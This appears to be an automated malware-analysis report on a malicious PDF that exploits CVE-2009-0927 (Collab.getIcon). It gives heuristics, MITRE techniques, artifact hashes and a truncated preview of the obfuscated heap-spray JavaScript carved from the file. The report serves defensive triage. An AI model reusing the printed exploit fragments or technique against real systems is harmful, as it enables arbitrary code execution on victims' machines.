Verdict: MALICIOUS
Risk Score: 268
Malware Insights
MITRE ATT&CK:
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
- T1566.001 Spearphishing Attachment
The PDF sample contains embedded JavaScript that leverages the CVE-2009-0927 vulnerability (Collab.getIcon). The JavaScript is heavily obfuscated but is identified as a generic exploit stage, indicating its purpose is to download and execute a secondary payload. This is a common technique for delivering malware via malicious documents.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (7):
- Collab.getIcon — CVE-2009-0927 (critical, CVE exact, CVE_2009_0927): PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
- JavaScript action (low, 2 related findings, PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical, PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Embedded JS stream (low, PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high, PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- ASCIIHexDecode filter (with exploit indicators) (medium, PDF_FILTER_HEX): Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| javascript_obj0006_000.js | 2481efddf094d73054afbfd066a1f8fe8b2c4f5c391f68a2861a049cbffb878b | pdf-javascript-stream | PDF /JS object 6 at offset 0x205 | 6302 bytes |

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
var wsxrkFTzHkSZMzOigJzSfZCDCjxKGLTLHPauflVQgSkZzweXoIWUpUHasIwZzaPYfbSX ="";
for (bWmrYAmWmjeGNPhsFKdjiWpryvmmNenjvUfbQRThuWBYMrNQKFJAcpsljyrqaYEsYmDeCXkfQMxkNFUpWKvfkxIsrkuSHIYlgc=128;bWmrYAmWmjeGNPhsFKdjiWpryvmmNenjvUfbQRThuWBYMrNQKFJAcpsljyrqaYEsYmDeCXkfQMxkNFUpWKvfkxIsrkuSHIYlgc>=0;--bWmrYAmWmjeGNPhsFKdjiWpryvmmNenjvUfbQRThuWBYMrNQKFJAcpsljyrqaYEsYmDeCXkfQMxkNFUpWKvfkxIsrkuSHIYlgc) wsxrkFTzHkSZMzOigJzSfZCDCjxKGLTLHPauflVQgSkZzweXoIWUpUHasIwZzaPYfbSX += unescape("%u0c2c%u48b1");
tnHVyCLKCwmlYkfIFTHsmgahHOgptOktaqJmzk = wsxrkFTzHkSZMzOigJzSfZCDCjxKGLTLHPauflVQgSkZzweXoIWUpUHasIwZzaPYfbSX + obiqORDGsvqVrUpwuuaROMSYcbuOSolyADrfdVrmlNsSgjPrTLosmAxpvmesCqocTHbDvlBARGRumK;
UMVBMGNpYpkjLBbyTueNUXNqRqMUconpfEKSvQSzXWeghbKeCvaCldzZmWupPXSTEaQnFRTLGdCdZktAzoMOcMWsCfnrTwrMmYqZ = unescape("%u0c2c%u48b1");
BiUThIXNlvPplcDOGLrWHvICjprIAeVImIwQSKNRFIFqSTvjbckSH = 20;
POfXXwxiRWGIwwamukAohzVquBuQdhoFlHkAxgSoxKJk
... (truncated)
| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| generic_stage_recovery_000.js | d0072ea97353284eb299d8923141b63a107927b59d1681a2f8979ed248a82da9 | deobfuscated-js | generic stage recovery percent-decode from JavaScript object 6 at offset 0x205 | 6300 bytes |

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).